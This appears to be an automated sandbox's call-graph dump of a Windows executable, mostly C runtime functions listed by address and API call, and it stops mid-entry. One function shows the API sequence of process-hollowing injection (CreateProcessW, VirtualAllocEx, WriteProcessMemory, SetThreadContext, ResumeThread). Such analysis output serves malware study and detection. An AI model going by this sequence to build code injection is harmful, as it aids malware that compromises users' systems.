17440->17441 17445 33bebd 17441->17445 17444->17439 17448 338773 LeaveCriticalSection 17445->17448 17447 33bbb7 17447->17427 17448->17447 17528 33416b 17529 33417f 17528->17529 17530 3343df 69 API calls 17529->17530 17535 3341da 17529->17535 17531 3341aa 17530->17531 17532 3341c7 17531->17532 17533 33ae1d 67 API calls 17531->17533 17531->17535 17532->17535 17536 33c01e 17532->17536 17533->17532 17537 33c029 17536->17537 17538 33c03e 17536->17538 17541 33ad6d __dosmaperr 14 API calls 17537->17541 17539 33c046 17538->17539 17540 33c05b 17538->17540 17542 33ad6d __dosmaperr 14 API calls 17539->17542 17550 344217 17540->17550 17544 33c02e 17541->17544 17545 33c04b 17542->17545 17547 33b458 __strnicoll 29 API calls 17544->17547 17548 33b458 __strnicoll 29 API calls 17545->17548 17546 33c056 17546->17535 17549 33c039 17547->17549 17548->17546 17549->17535 17551 34422b _Fputc 17550->17551 17554 3447c0 17551->17554 17553 344237 _Fputc 17553->17546 17555 3447cc ___scrt_is_nonwritable_in_current_image 17554->17555 17556 3447f6 17555->17556 17557 3447d3 17555->17557 17565 33875f EnterCriticalSection 17556->17565 17558 33b601 __strnicoll 29 API calls 17557->17558 17561 3447ec 17558->17561 17560 344804 17566 34461f 17560->17566 17561->17553 17563 344813 17579 344845 17563->17579 17565->17560 17567 344656 17566->17567 17568 34462e 17566->17568 17570 340efc _Fputc 29 API calls 17567->17570 17569 33b601 __strnicoll 29 API calls 17568->17569 17578 344649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17569->17578 17571 34465f 17570->17571 17572 344051 33 API calls 17571->17572 17573 34467d 17572->17573 17574 344709 17573->17574 17576 344720 17573->17576 17573->17578 17575 3442a9 34 API calls 17574->17575 17575->17578 17577 344454 33 API calls 17576->17577 17576->17578 17577->17578 17578->17563 17582 338773 LeaveCriticalSection 17579->17582 17581 34484d 17581->17561 17582->17581 16470 33884f 16471 33bbb9 ___scrt_uninitialize_crt 68 API calls 16470->16471 16472 338857 16471->16472 16480 340cde 16472->16480 16474 33885c 16490 340d89 16474->16490 16477 338886 16478 33e4f7 ___free_lconv_mon 14 API calls 16477->16478 16479 338891 16478->16479 16481 340cea ___scrt_is_nonwritable_in_current_image 16480->16481 16494 33b750 EnterCriticalSection 16481->16494 16483 340d61 16499 340d80 16483->16499 16485 340cf5 16485->16483 16487 340d35 DeleteCriticalSection 16485->16487 16495 33ba11 16485->16495 16489 33e4f7 ___free_lconv_mon 14 API calls 16487->16489 16489->16485 16491 33886b DeleteCriticalSection 16490->16491 16492 340da0 16490->16492 16491->16474 16491->16477 16492->16491 16493 33e4f7 ___free_lconv_mon 14 API calls 16492->16493 16493->16491 16494->16485 16496 33ba24 _Fputc 16495->16496 16502 33bacf 16496->16502 16498 33ba30 _Fputc 16498->16485 16574 33b767 LeaveCriticalSection 16499->16574 16501 340d6d 16501->16474 16503 33badb ___scrt_is_nonwritable_in_current_image 16502->16503 16504 33bae5 16503->16504 16505 33bb08 16503->16505 16506 33b601 __strnicoll 29 API calls 16504->16506 16512 33bb00 16505->16512 16513 33875f EnterCriticalSection 16505->16513 16506->16512 16508 33bb26 16514 33ba41 16508->16514 16510 33bb33 16528 33bb5e 16510->16528 16512->16498 16513->16508 16515 33ba71 16514->16515 16516 33ba4e 16514->16516 16518 33ba69 16515->16518 16519 33bc27 ___scrt_uninitialize_crt 64 API calls 16515->16519 16517 33b601 __strnicoll 29 API calls 16516->16517 16517->16518 16518->16510 16520 33ba89 16519->16520 16521 340d89 14 API calls 16520->16521 16522 33ba91 16521->16522 16523 340efc _Fputc 29 API calls 16522->16523 16524 33ba9d 16523->16524 16531 344ff5 16524->16531 16527 33e4f7 ___free_lconv_mon 14 API calls 16527->16518 16573 338773 LeaveCriticalSection 16528->16573 16530 33bb64 16530->16512 16532 33baa4 16531->16532 16533 34501e 16531->16533 16532->16518 16532->16527 16534 34506d 16533->16534 16536 345045 16533->16536 16535 33b601 __strnicoll 29 API calls 16534->16535 16535->16532 16538 345098 16536->16538 16539 3450a4 ___scrt_is_nonwritable_in_current_image 16538->16539 16546 344ef9 EnterCriticalSection 16539->16546 16541 3450b2 16542 3450e3 16541->16542 16547 344f55 16541->16547 16560 34511d 16542->16560 16546->16541 16548 344cb0 _Fputc 29 API calls 16547->16548 16549 344f65 16548->16549 16550 344f6b 16549->16550 16552 344f9d 16549->16552 16554 344cb0 _Fputc 29 API calls 16549->16554 16563 344d1a 16550->16563 16552->16550 16553 344cb0 _Fputc 29 API calls 16552->16553 16555 344fa9 CloseHandle 16553->16555 16556 344f94 16554->16556 16555->16550 16557 344fb5 GetLastError 16555->16557 16558 344cb0 _Fputc 29 API calls 16556->16558 16557->16550 16558->16552 16559 344fc3 __fread_nolock 16559->16542 16572 344f1c LeaveCriticalSection 16560->16572 16562 345106 16562->16532 16564 344d90 16563->16564 16565 344d29 16563->16565 16566 33ad6d __dosmaperr 14 API calls 16564->16566 16565->16564 16571 344d53 16565->16571 16567 344d95 16566->16567 16568 33ad80 __dosmaperr 14 API calls 16567->16568 16569 344d80 16568->16569 16569->16559 16570 344d7a SetStdHandle 16570->16569 16571->16569 16571->16570 16572->16562 16573->16530 16574->16501 16591 3342bc 16592 3342c8 16591->16592 16593 3342ff 16592->16593 16597 33cc2c 16592->16597 16595 3342ec 16595->16593 16601 334362 16595->16601 16598 33cc3f _Fputc 16597->16598 16605 33cc99 16598->16605 16600 33cc54 _Fputc 16600->16595 16602 334381 16601->16602 16603 3343a3 16602->16603 16635 338719 16602->16635 16603->16593 16606 33ccab 16605->16606 16608 33ccce 16605->16608 16607 33b601 __strnicoll 29 API calls 16606->16607 16609 33ccc6 16607->16609 16608->16606 16610 33ccf5 16608->16610 16609->16600 16613 33cdcf 16610->16613 16614 33cddb ___scrt_is_nonwritable_in_current_image 16613->16614 16621 33875f EnterCriticalSection 16614->16621 16616 33cde9 16622 33cd2f 16616->16622 16618 33cdf6 16631 33ce1e 16618->16631 16621->16616 16623 33bc27 ___scrt_uninitialize_crt 64 API calls 16622->16623 16624 33cd4a 16623->16624 16625 340d89 14 API calls 16624->16625 16626 33cd54 16625->16626 16627 33f807 __dosmaperr 14 API calls 16626->16627 16630 33cd6f 16626->16630 16628 33cd93 16627->16628 16629 33e4f7 ___free_lconv_mon 14 API calls 16628->16629 16629->16630 16630->16618 16634 338773 LeaveCriticalSection 16631->16634 16633 33cd2d 16633->16600 16634->16633 16636 338725 16635->16636 16637 33873a 16635->16637 16638 33ad6d __dosmaperr 14 API calls 16636->16638 16637->16603 16639 33872a 16638->16639 16640 33b458 __strnicoll 29 API calls 16639->16640 16641 338735 16640->16641 16641->16603 17753 333fa3 17755 333fb9 _Yarn 17753->17755 17754 333fbf 17755->17754 17756 334065 17755->17756 17759 33c32c 17755->17759 17756->17754 17758 33c32c __fread_nolock 45 API calls 17756->17758 17758->17754 17762 33c28f 17759->17762 17764 33c29b ___scrt_is_nonwritable_in_current_image 17762->17764 17763 33c2d3 17763->17755 17764->17763 17765 33c2e5 17764->17765 17766 33c2ae __fread_nolock 17764->17766 17775 33875f EnterCriticalSection 17765->17775 17769 33ad6d __dosmaperr 14 API calls 17766->17769 17768 33c2ef 17776 33c349 17768->17776 17771 33c2c8 17769->17771 17772 33b458 __strnicoll 29 API calls 17771->17772 17772->17763 17775->17768 17778 33c35b __fread_nolock 17776->17778 17782 33c306 17776->17782 17777 33c368 17779 33ad6d __dosmaperr 14 API calls 17777->17779 17778->17777 17778->17782 17785 33c3b9 17778->17785 17780 33c36d 17779->17780 17781 33b458 __strnicoll 29 API calls 17780->17781 17781->17782 17790 33c324 17782->17790 17783 345d52 __fread_nolock 43 API calls 17783->17785 17784 33c4e4 __fread_nolock 17788 33ad6d __dosmaperr 14 API calls 17784->17788 17785->17782 17785->17783 17785->17784 17786 33c20e __fread_nolock 29 API calls 17785->17786 17787 340efc _Fputc 29 API calls 17785->17787 17789 34625d __fread_nolock 41 API calls 17785->17789 17786->17785 17787->17785 17788->17780 17789->17785 17793 338773 LeaveCriticalSection 17790->17793 17792 33c32a 17792->17763 17793->17792 15366 35519e 15368 3551d4 15366->15368 15367 355321 GetPEB 15369 355333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 15367->15369 15368->15367 15368->15369 15374 3553ca TerminateProcess 15368->15374 15369->15368 15370 3553da WriteProcessMemory 15369->15370 15371 35541f 15370->15371 15372 355424 WriteProcessMemory 15371->15372 15373 355461 WriteProcessMemory Wow64SetThreadContext ResumeThread 15371->15373 15372->15371 15374->15368 13316 3357d0 13317 3357dc ___scrt_is_nonwritable_in_current_image 13316->13317 13343 332baf 13317->13343 13319 3357e3 13320 33593c 13319->13320 13328 33580d ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 13319->13328 13379 335020 IsProcessorFeaturePresent 13320->13379 13322 335943 13323 335949 13322->13323 13383 338bd6 13322->13383 13386 338bec 13323->13386 13327 33582c 13328->13327 13329 3358ad 13328->13329 13331 3358a6 13328->13331 13361 33b145 13329->13361 13354 338c20 13331->13354 13333 3358b3 13365 35804b 13333->13365 13338 3358d8 13339 3358e1 13338->13339 13370 338c02 13338->13370 13373 332be8 13339->13373 13344 332bb8 13343->13344 13389 334c8c IsProcessorFeaturePresent 13344->13389 13348 332bc9 13349 332bcd 13348->13349 13399 33867a 13348->13399 13349->13319 13352 332be4 13352->13319 13355 338c36 std::_Lockit::_Lockit 13354->13355 13356 33cf0b ___scrt_is_nonwritable_in_current_image 13354->13356 13355->13329 13471 33e783 GetLastError 13356->13471 13362 33b153 13361->13362 13363 33b14e 13361->13363 13362->13333 13844 33b26e 13363->13844 14447 358000 GetModuleHandleA GetModuleFileNameA ExitProcess 13365->14447 13368 334fcd GetModuleHandleW 13369 334fd9 13368->13369 13369->13322 13369->13338 14450 338d21 13370->14450 13374 332bf4 13373->13374 13375 332c0a 13374->13375 14521 33868c 13374->14521 13375->13327 13377 332c02 13378 336188 ___scrt_uninitialize_crt 7 API calls 13377->13378 13378->13375 13380 335036 __fread_nolock __CreateFrameInfo 13379->13380 13381 3350e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13380->13381 13382 335125 __CreateFrameInfo 13381->13382 13382->13322 13384 338d21 __CreateFrameInfo 21 API calls 13383->13384 13385 338be7 13384->13385 13385->13323 13387 338d21 __CreateFrameInfo 21 API calls 13386->13387 13388 335951 13387->13388 13390 332bc4 13389->13390 13391 336169 13390->13391 13408 33e1c6 13391->13408 13394 336172 13394->13348 13396 33617a 13397 336185 13396->13397 13422 33e202 13396->13422 13397->13348 13462 340815 13399->13462 13402 336188 13403 336191 13402->13403 13404 33619b 13402->13404 13405 33d297 ___vcrt_uninitialize_ptd 6 API calls 13403->13405 13404->13349 13406 336196 13405->13406 13407 33e202 ___vcrt_uninitialize_locks DeleteCriticalSection 13406->13407 13407->13404 13409 33e1cf 13408->13409 13411 33e1f8 13409->13411 13412 33616e 13409->13412 13426 347e4b 13409->13426 13413 33e202 ___vcrt_uninitialize_locks DeleteCriticalSection 13411->13413 13412->13394 13414 33d264 13412->13414 13413->13412 13443 347d5c 13414->13443 13417 33d279 13417->13396 13420 33d294 13420->13396 13423 33e22c 13422->13423 13424 33e20d 13422->13424 13423->13394 13425 33e217 DeleteCriticalSection 13424->13425 13425->13423 13425->13425 13431 347edd 13426->13431 13429 347e83 InitializeCriticalSectionAndSpinCount 13430 347e6e 13429->13430 13430->13409 13432 347e65 13431->13432 13435 347efe 13431->13435 13432->13429 13432->13430 13434 347f66 GetProcAddress 13434->13432 13435->13432 13435->13434 13436 347f57 13435->13436 13438 347e92 LoadLibraryExW 13435->13438 13436->13434 13437 347f5f FreeLibrary 13436->13437 13437->13434 13439 347ea9 GetLastError 13438->13439 13440 347ed9 13438->13440 13439->13440 13441 347eb4 ___vcrt_FlsGetValue 13439->13441 13440->13435 13441->13440 13442 347eca LoadLibraryExW 13441->13442 13442->13435 13444 347edd ___vcrt_FlsGetValue 5 API calls 13443->13444 13445 347d76 13444->13445 13446 347d8f TlsAlloc 13445->13446 13447 33d26e 13445->13447 13447->13417 13448 347e0d 13447->13448 13449 347edd ___vcrt_FlsGetValue 5 API calls 13448->13449 13450 347e27 13449->13450 13451 347e42 TlsSetValue 13450->13451 13452 33d287 13450->13452 13451->13452 13452->13420 13453 33d297 13452->13453 13454 33d2a1 13453->13454 13455 33d2a7 13453->13455 13457 347d97 13454->13457 13455->13417 13458 347edd ___vcrt_FlsGetValue 5 API calls 13457->13458 13459 347db1 13458->13459 13460 347dc9 TlsFree 13459->13460 13461 347dbd 13459->13461 13460->13461 13461->13455 13463 340825 13462->13463 13464 332bd6 13462->13464 13463->13464 13466 33ff89 13463->13466 13464->13352 13464->13402 13468 33ff90 13466->13468 13467 33ffd3 GetStdHandle 13467->13468 13468->13467 13469 340035 13468->13469 13470 33ffe6 GetFileType 13468->13470 13469->13463 13470->13468 13472 33e79f 13471->13472 13473 33e799 13471->13473 13477 33e7a3 SetLastError 13472->13477 13514 33f1da 13472->13514 13509 33f19b 13473->13509 13480 33cf1c 13477->13480 13481 33e838 13477->13481 13498 33b9c2 13480->13498 13483 33b9c2 CallUnexpected 37 API calls 13481->13483 13488 33e83d 13483->13488 13484 33e7e9 13487 33f1da __dosmaperr 6 API calls 13484->13487 13485 33e7d8 13486 33f1da __dosmaperr 6 API calls 13485->13486 13495 33e7e6 13486->13495 13489 33e7f5 13487->13489 13490 33e810 13489->13490 13491 33e7f9 13489->13491 13532 33ea94 13490->13532 13492 33f1da __dosmaperr 6 API calls 13491->13492 13492->13495 13526 33e4f7 13495->13526 13497 33e4f7 ___free_lconv_mon 14 API calls 13497->13477 13733 3408cc 13498->13733 13502 33b9dc IsProcessorFeaturePresent 13505 33b9e8 13502->13505 13503 338bec __CreateFrameInfo 21 API calls 13507 33ba05 13503->13507 13504 33b9d2 13504->13502 13508 33b9fb 13504->13508 13763 33b4b9 13505->13763 13508->13503 13537 33f534 13509->13537 13511 33f1b7 13512 33f1d2 TlsGetValue 13511->13512 13513 33f1c0 13511->13513 13513->13472 13515 33f534 std::_Lockit::_Lockit 5 API calls 13514->13515 13516 33f1f6 13515->13516 13517 33f214 TlsSetValue 13516->13517 13518 33e7bb 13516->13518 13518->13477 13519 33f807 13518->13519 13524 33f814 __dosmaperr 13519->13524 13520 33f83f HeapAlloc 13522 33e7d0 13520->13522 13520->13524 13521 33f854 13554 33ad6d 13521->13554 13522->13484 13522->13485 13524->13520 13524->13521 13551 338f08 13524->13551 13527 33e502 HeapFree 13526->13527 13531 33e52c 13526->13531 13528 33e517 GetLastError 13527->13528 13527->13531 13529 33e524 __dosmaperr 13528->13529 13530 33ad6d __dosmaperr 12 API calls 13529->13530 13530->13531 13531->13477 13591 33ebfa 13532->13591 13538 33f564 13537->13538 13542 33f560 std::_Lockit::_Lockit 13537->13542 13538->13542 13543 33f469 13538->13543 13541 33f57e GetProcAddress 13541->13542 13542->13511 13549 33f47a ___vcrt_FlsGetValue 13543->13549 13544 33f510 13544->13541 13544->13542 13545 33f498 LoadLibraryExW 13546 33f4b3 GetLastError 13545->13546 13547 33f517 13545->13547 13546->13549 13547->13544 13548 33f529 FreeLibrary 13547->13548 13548->13544 13549->13544 13549->13545 13550 33f4e6 LoadLibraryExW 13549->13550 13550->13547 13550->13549 13557 338f43 13551->13557 13568 33e8d4 GetLastError 13554->13568 13556 33ad72 13556->13522 13558 338f4f ___scrt_is_nonwritable_in_current_image 13557->13558 13563 33b750 EnterCriticalSection 13558->13563 13560 338f5a __CreateFrameInfo 13564 338f91 13560->13564 13563->13560 13567 33b767 LeaveCriticalSection 13564->13567 13566 338f13 13566->13524 13567->13566 13569 33e8f0 13568->13569 13570 33e8ea 13568->13570 13571 33f1da __dosmaperr 6 API calls 13569->13571 13574 33e8f4 SetLastError 13569->13574 13572 33f19b __dosmaperr 6 API calls 13570->13572 13573 33e90c 13571->13573 13572->13569 13573->13574 13576 33f807 __dosmaperr 12 API calls 13573->13576 13574->13556 13577 33e921 13576->13577 13578 33e93a 13577->13578 13579 33e929 13577->13579 13581 33f1da __dosmaperr 6 API calls 13578->13581 13580 33f1da __dosmaperr 6 API calls 13579->13580 13582 33e937 13580->13582 13583 33e946 13581->13583 13587 33e4f7 ___free_lconv_mon 12 API calls 13582->13587 13584 33e961 13583->13584 13585 33e94a 13583->13585 13588 33ea94 __dosmaperr 12 API calls 13584->13588 13586 33f1da __dosmaperr 6 API calls 13585->13586 13586->13582 13587->13574 13589 33e96c 13588->13589 13590 33e4f7 ___free_lconv_mon 12 API calls 13589->13590 13590->13574 13592 33ec06 ___scrt_is_nonwritable_in_current_image 13591->13592 13605 33b750 EnterCriticalSection 13592->13605 13594 33ec10 13606 33ec40 13594->13606 13597 33ec4c 13598 33ec58 ___scrt_is_nonwritable_in_current_image 13597->13598 13610 33b750 EnterCriticalSection 13598->13610 13600 33ec62 13611 33ea49 13600->13611 13602 33ec7a 13615 33ec9a 13602->13615 13605->13594 13609 33b767 LeaveCriticalSection 13606->13609 13608 33eb02 13608->13597 13609->13608 13610->13600 13612 33ea58 __Getctype 13611->13612 13614 33ea7f __Getctype 13611->13614 13612->13614 13618 341e7b 13612->13618 13614->13602 13732 33b767 LeaveCriticalSection 13615->13732 13617 33e81b 13617->13497 13620 341efb 13618->13620 13621 341e91 13618->13621 13622 33e4f7 ___free_lconv_mon 14 API calls 13620->13622 13645 341f49 13620->13645 13621->13620 13625 341ec4 13621->13625 13628 33e4f7 ___free_lconv_mon 14 API calls 13621->13628 13623 341f1d 13622->13623 13624 33e4f7 ___free_lconv_mon 14 API calls 13623->13624 13626 341f30 13624->13626 13630 33e4f7 ___free_lconv_mon 14 API calls 13625->13630 13644 341ee6 13625->13644 13631 33e4f7 ___free_lconv_mon 14 API calls 13626->13631 13627 33e4f7 ___free_lconv_mon 14 API calls 13632 341ef0 13627->13632 13634 341eb9 13628->13634 13629 341f57 13633 341fb7 13629->13633 13640 33e4f7 14 API calls ___free_lconv_mon 13629->13640 13635 341edb 13630->13635 13636 341f3e 13631->13636 13637 33e4f7 ___free_lconv_mon 14 API calls 13632->13637 13638 33e4f7 ___free_lconv_mon 14 API calls 13633->13638 13646 3412dd 13634->13646 13674 3415f8 13635->13674 13642 33e4f7 ___free_lconv_mon 14 API calls 13636->13642 13637->13620 13643 341fbd 13638->13643 13640->13629 13642->13645 13643->13614 13644->13627 13686 342015 13645->13686 13647 3412ee 13646->13647 13673 3413d7 13646->13673 13648 33e4f7 ___free_lconv_mon 14 API calls 13647->13648 13649 3412ff 13647->13649 13648->13649 13650 33e4f7 ___free_lconv_mon 14 API calls 13649->13650 13652 341311 13649->13652 13650->13652 13651 341323 13654 341335 13651->13654 13655 33e4f7 ___free_lconv_mon 14 API calls 13651->13655 13652->13651 13653 33e4f7 ___free_lconv_mon 14 API calls 13652->13653 13653->13651 13656 341347 13654->13656 13657 33e4f7 ___free_lconv_mon 14 API calls 13654->13657 13655->13654 13658 341359 13656->13658 13659 33e4f7 ___free_lconv_mon 14 API calls 13656->13659 13657->13656 13659->13658 13673->13625 13675 341605 13674->13675 13685 34165d 13674->13685 13676 33e4f7 ___free_lconv_mon 14 API calls 13675->13676 13680 341615 13675->13680 13676->13680 13677 33e4f7 ___free_lconv_mon 14 API calls 13678 341627 13677->13678 13679 341639 13678->13679 13681 33e4f7 ___free_lconv_mon 14 API calls 13678->13681 13682 34164b 13679->13682 13683 33e4f7 ___free_lconv_mon 14 API calls 13679->13683 13680->13677 13680->13678 13681->13679 13684 33e4f7 ___free_lconv_mon 14 API calls 13682->13684 13682->13685 13683->13682 13684->13685 13685->13644 13687 342022 13686->13687 13691 342041 13686->13691 13687->13691 13692 3416dc 13687->13692 13690 33e4f7 ___free_lconv_mon 14 API calls 13690->13691 13691->13629 13693 3417ba 13692->13693 13694 3416ed 13692->13694 13693->13690 13728 341a3c 13694->13728 13697 341a3c __Getctype 14 API calls 13698 341700 13697->13698 13699 341a3c __Getctype 14 API calls 13698->13699 13731 341a4e 13728->13731 13729 3416f5 13729->13697 13730 33e4f7 ___free_lconv_mon 14 API calls 13730->13731 13731->13729 13731->13730 13732->13617 13769 340b4f 13733->13769 13736 3408f3 13739 3408ff ___scrt_is_nonwritable_in_current_image 13736->13739 13737 33e8d4 __dosmaperr 14 API calls 13745 340930 __CreateFrameInfo 13737->13745 13738 34094f 13741 33ad6d __dosmaperr 14 API calls 13738->13741 13739->13737 13739->13738 13740 340961 __CreateFrameInfo 13739->13740 13739->13745 13742 340997 __CreateFrameInfo 13740->13742 13783 33b750 EnterCriticalSection 13740->13783 13743 340954 13741->13743 13747 3409d4 13742->13747 13748 340ad1 13742->13748 13759 340a02 13742->13759 13780 33b458 13743->13780 13745->13738 13745->13740 13762 340939 13745->13762 13754 33e783 __Getctype 39 API calls 13747->13754 13747->13759 13751 340adc 13748->13751 13788 33b767 LeaveCriticalSection 13748->13788 13753 338bec __CreateFrameInfo 21 API calls 13751->13753 13755 340ae4 13753->13755 13757 3409f7 13754->13757 13756 33e783 __Getctype 39 API calls 13760 340a57 13756->13760 13758 33e783 __Getctype 39 API calls 13757->13758 13758->13759 13784 340a7d 13759->13784 13761 33e783 __Getctype 39 API calls 13760->13761 13760->13762 13761->13762 13762->13504 13764 33b4d5 __fread_nolock __CreateFrameInfo 13763->13764 13765 33b501 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13764->13765 13768 33b5d2 __CreateFrameInfo 13765->13768 13767 33b5f0 13767->13508 13836 3329c6 13768->13836 13770 340b5b ___scrt_is_nonwritable_in_current_image 13769->13770 13775 33b750 EnterCriticalSection 13770->13775 13772 340b69 13776 340bab 13772->13776 13775->13772 13779 33b767 LeaveCriticalSection 13776->13779 13778 33b9c7 13778->13504 13778->13736 13779->13778 13789 33b6a7 13780->13789 13782 33b464 13782->13762 13783->13742 13785 340a81 13784->13785 13786 340a49 13784->13786 13835 33b767 LeaveCriticalSection 13785->13835 13786->13756 13786->13760 13786->13762 13788->13751 13790 33b6b9 _Fputc 13789->13790 13793 33b601 13790->13793 13792 33b6d1 _Fputc 13792->13782 13794 33b611 13793->13794 13795 33b618 13793->13795 13802 338af0 GetLastError 13794->13802 13800 33b626 13795->13800 13806 33b67e 13795->13806 13798 33b64d 13798->13800 13809 33b485 IsProcessorFeaturePresent 13798->13809 13800->13792 13801 33b67d 13803 338b09 13802->13803 13813 33e985 13803->13813 13807 33b6a2 13806->13807 13808 33b689 GetLastError SetLastError 13806->13808 13807->13798 13808->13798 13810 33b491 13809->13810 13811 33b4b9 __CreateFrameInfo 8 API calls 13810->13811 13812 33b4a6 GetCurrentProcess TerminateProcess 13811->13812 13812->13801 13814 33e99e 13813->13814 13815 33e998 13813->13815 13816 33f1da __dosmaperr 6 API calls 13814->13816 13834 338b25 SetLastError 13814->13834 13817 33f19b __dosmaperr 6 API calls 13815->13817 13818 33e9b8 13816->13818 13817->13814 13819 33f807 __dosmaperr 14 API calls 13818->13819 13818->13834 13820 33e9c8 13819->13820 13821 33e9d0 13820->13821 13822 33e9e5 13820->13822 13824 33f1da __dosmaperr 6 API calls 13821->13824 13823 33f1da __dosmaperr 6 API calls 13822->13823 13825 33e9f1 13823->13825 13828 33e9dc 13824->13828 13826 33e9f5 13825->13826 13827 33ea04 13825->13827 13829 33f1da __dosmaperr 6 API calls 13826->13829 13830 33ea94 __dosmaperr 14 API calls 13827->13830 13831 33e4f7 ___free_lconv_mon 14 API calls 13828->13831 13829->13828 13832 33ea0f 13830->13832 13831->13834 13833 33e4f7 ___free_lconv_mon 14 API calls 13832->13833 13833->13834 13834->13795 13835->13786 13837 3329cf IsProcessorFeaturePresent 13836->13837 13838 3329ce 13836->13838 13840 334b7e 13837->13840 13838->13767 13843 334c64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13840->13843 13842 334c61 13842->13767 13843->13842 13845 33b277 13844->13845 13846 33b28d 13844->13846 13845->13846 13850 33b1af 13845->13850 13846->13362 13848 33b284 13848->13846 13867 33b37c 13848->13867 13851 33b1bb 13850->13851 13852 33b1b8 13850->13852 13876 34004c 13851->13876 13852->13848 13857 33b1d8 13903 33b29a 13857->13903 13858 33b1cc 13860 33e4f7 ___free_lconv_mon 14 API calls 13858->13860 13862 33b1d2 13860->13862 13862->13848 13863 33e4f7 ___free_lconv_mon 14 API calls 13864 33b1fc 13863->13864 13865 33e4f7 ___free_lconv_mon 14 API calls 13864->13865 13866 33b202 13865->13866 13866->13848 13868 33b3ed 13867->13868 13871 33b38b 13867->13871 13868->13846 13869 33e641 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 13869->13871 13870 33f807 __dosmaperr 14 API calls 13870->13871 13871->13868 13871->13869 13871->13870 13873 33b3f1 13871->13873 13875 33e4f7 ___free_lconv_mon 14 API calls 13871->13875 14166 344926 13871->14166 13872 33e4f7 ___free_lconv_mon 14 API calls 13872->13868 13873->13872 13875->13871 13877 340055 13876->13877 13878 33b1c1 13876->13878 13925 33e83e 13877->13925 13882 34484f GetEnvironmentStringsW 13878->13882 13883 344867 13882->13883 13888 33b1c6 13882->13888 13884 33e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13883->13884 13885 344884 13884->13885 13886 34488e FreeEnvironmentStringsW 13885->13886 13887 344899 13885->13887 13886->13888 13889 33e531 __fread_nolock 15 API calls 13887->13889 13888->13857 13888->13858 13890 3448a0 13889->13890 13891 3448a8 13890->13891 13892 3448b9 13890->13892 13894 33e4f7 ___free_lconv_mon 14 API calls 13891->13894 13893 33e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13892->13893 13896 3448c9 13893->13896 13895 3448ad FreeEnvironmentStringsW 13894->13895 13895->13888 13897 3448d0 13896->13897 13898 3448d8 13896->13898 13899 33e4f7 ___free_lconv_mon 14 API calls 13897->13899 13900 33e4f7 ___free_lconv_mon 14 API calls 13898->13900 13901 3448d6 FreeEnvironmentStringsW 13899->13901 13900->13901 13901->13888 13904 33b2af 13903->13904 13905 33f807 __dosmaperr 14 API calls 13904->13905 13906 33b2d6 13905->13906 13907 33b2de 13906->13907 13916 33b2e8 13906->13916 13908 33e4f7 ___free_lconv_mon 14 API calls 13907->13908 13924 33b1df 13908->13924 13909 33b345 13910 33e4f7 ___free_lconv_mon 14 API calls 13909->13910 13910->13924 13911 33f807 __dosmaperr 14 API calls 13911->13916 13912 33b354 14160 33b23f 13912->14160 13916->13909 13916->13911 13916->13912 13918 33b36f 13916->13918 13920 33e4f7 ___free_lconv_mon 14 API calls 13916->13920 14151 33e16c 13916->14151 13917 33e4f7 ___free_lconv_mon 14 API calls 13919 33b361 13917->13919 13921 33b485 __Getctype 11 API calls 13918->13921 13922 33e4f7 ___free_lconv_mon 14 API calls 13919->13922 13920->13916 13923 33b37b 13921->13923 13922->13924 13924->13863 13926 33e84f 13925->13926 13927 33e849 13925->13927 13929 33f1da __dosmaperr 6 API calls 13926->13929 13946 33e855 13926->13946 13928 33f19b __dosmaperr 6 API calls 13927->13928 13928->13926 13930 33e869 13929->13930 13931 33f807 __dosmaperr 14 API calls 13930->13931 13930->13946 13933 33e879 13931->13933 13932 33b9c2 CallUnexpected 39 API calls 13934 33e8d3 13932->13934 13935 33e881 13933->13935 13936 33e896 13933->13936 13937 33f1da __dosmaperr 6 API calls 13935->13937 13938 33f1da __dosmaperr 6 API calls 13936->13938 13947 33e88d 13937->13947 13939 33e8a2 13938->13939 13940 33e8a6 13939->13940 13941 33e8b5 13939->13941 13943 33f1da __dosmaperr 6 API calls 13940->13943 13944 33ea94 __dosmaperr 14 API calls 13941->13944 13942 33e4f7 ___free_lconv_mon 14 API calls 13942->13946 13943->13947 13945 33e8c0 13944->13945 13948 33e4f7 ___free_lconv_mon 14 API calls 13945->13948 13946->13932 13949 33e85a 13946->13949 13947->13942 13948->13949 13950 34040d 13949->13950 13951 340437 13950->13951 13972 340299 13951->13972 13956 340477 13986 340094 13956->13986 13957 340469 13958 33e4f7 ___free_lconv_mon 14 API calls 13957->13958 13960 340450 13958->13960 13960->13878 13962 3404af 13963 33ad6d __dosmaperr 14 API calls 13962->13963 13965 3404b4 13963->13965 13964 3404f6 13968 34053f 13964->13968 13997 3407c8 13964->13997 13966 33e4f7 ___free_lconv_mon 14 API calls 13965->13966 13966->13960 13967 3404ca 13967->13964 13970 33e4f7 ___free_lconv_mon 14 API calls 13967->13970 13969 33e4f7 ___free_lconv_mon 14 API calls 13968->13969 13969->13960 13970->13964 14005 337e1a 13972->14005 13975 3402cc 13977 3402e3 13975->13977 13978 3402d1 GetACP 13975->13978 13976 3402ba GetOEMCP 13976->13977 13977->13960 13979 33e531 13977->13979 13978->13977 13980 33e56f 13979->13980 13985 33e53f __dosmaperr 13979->13985 13981 33ad6d __dosmaperr 14 API calls 13980->13981 13983 33e56d 13981->13983 13982 33e55a RtlAllocateHeap 13982->13983 13982->13985 13983->13956 13983->13957 13984 338f08 codecvt 2 API calls 13984->13985 13985->13980 13985->13982 13985->13984 13987 340299 41 API calls 13986->13987 13988 3400b4 13987->13988 13989 3401b9 13988->13989 13991 3400f1 IsValidCodePage 13988->13991 13996 34010c __fread_nolock 13988->13996 13990 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13989->13990 13992 340297 13990->13992 13991->13989 13993 340103 13991->13993 13992->13962 13992->13967 13994 34012c GetCPInfo 13993->13994 13993->13996 13994->13989 13994->13996 14045 340623 13996->14045 13998 3407d4 ___scrt_is_nonwritable_in_current_image 13997->13998 14125 33b750 EnterCriticalSection 13998->14125 14000 3407de 14126 340562 14000->14126 14006 337e31 